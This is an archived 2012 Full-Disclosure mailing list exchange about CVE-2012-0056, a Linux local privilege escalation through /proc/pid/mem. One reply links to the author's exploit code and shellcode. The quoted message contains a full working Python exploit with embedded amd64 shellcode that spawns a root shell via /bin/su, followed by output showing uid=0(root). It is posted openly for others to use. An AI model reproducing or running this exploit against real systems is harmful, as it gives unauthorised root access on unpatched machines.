lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 23 Jan 2012 02:30:44 +0100
From: "Jason A. Donenfeld" <Jason@...c4.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Linux Local Root -- CVE-2012-0056 -- Detailed
	Write-up

NICE! Well, I guess posting that blog post defeated the point of not
publishing. :-D

So, here's my code:
  http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c

I wrote the shellcode by hand too, and you can grab the 32 and 64 bit
versions from that same tree.

Have fun.



BTW, before I'm asked, the reason why I don't hard code 12 for the
length of the su error string is that it's different on different
distros.

On Mon, Jan 23, 2012 at 02:14, sd <sd@...ksheep.org> wrote:
> 2012/1/23 Jason A. Donenfeld <Jason@...c4.com>:
>> Server presently DoS'd, or dreamhost is tweaking again.
>
> boring tl;dr - don't play kaminsky on us :)
>
> #!/usr/bin/python
> # CVE-2012-0056 amd64
> # sd@...ksheep.org
> #
> # hg clone https://code.google.com/p/python-passfd
> # cd python-passfd; ./setup.py build_ext --inplace; cd src
> # mv ~/hurrdurr.py .
> # ./hurrdurr.py `objdump -d /bin/su|grep 'exit@...'|head -n 1|cut -d '
> ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
> from socket import *
> from passfd import *
> from os import *
> from socket import *
> from sys import *
> from time import *
> if argv[-1]=='hax':
>        sk=int(argv[1])
>        fd=open("/proc/%d/mem"%getppid(),O_WRONLY)
>        lseek(fd,int(argv[2].split('x')[-1],16)-12,0)
>        sendfd(sk,fd)
>        sleep(1)
> else:
>        a,b=socketpair()
>        if not fork():
>                execl("/usr/bin/python","python",
>                      __file__,str(a.fileno()),argv[1],'hax')
>        dup2(recvfd(b)[0],2)
>        execl("/bin/su","su","\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2"+
>                "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb"+
>                "\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6"+
>                "\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05");
>
> --
> ./hurrdurr.py `objdump -d /bin/su|grep 'exit@...'|head -n 1|cut -d ' '
> -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
> id
> uid=0(root) gid=1000(sd)
> groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),110(netdev),125(lastfm),1000(sd)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ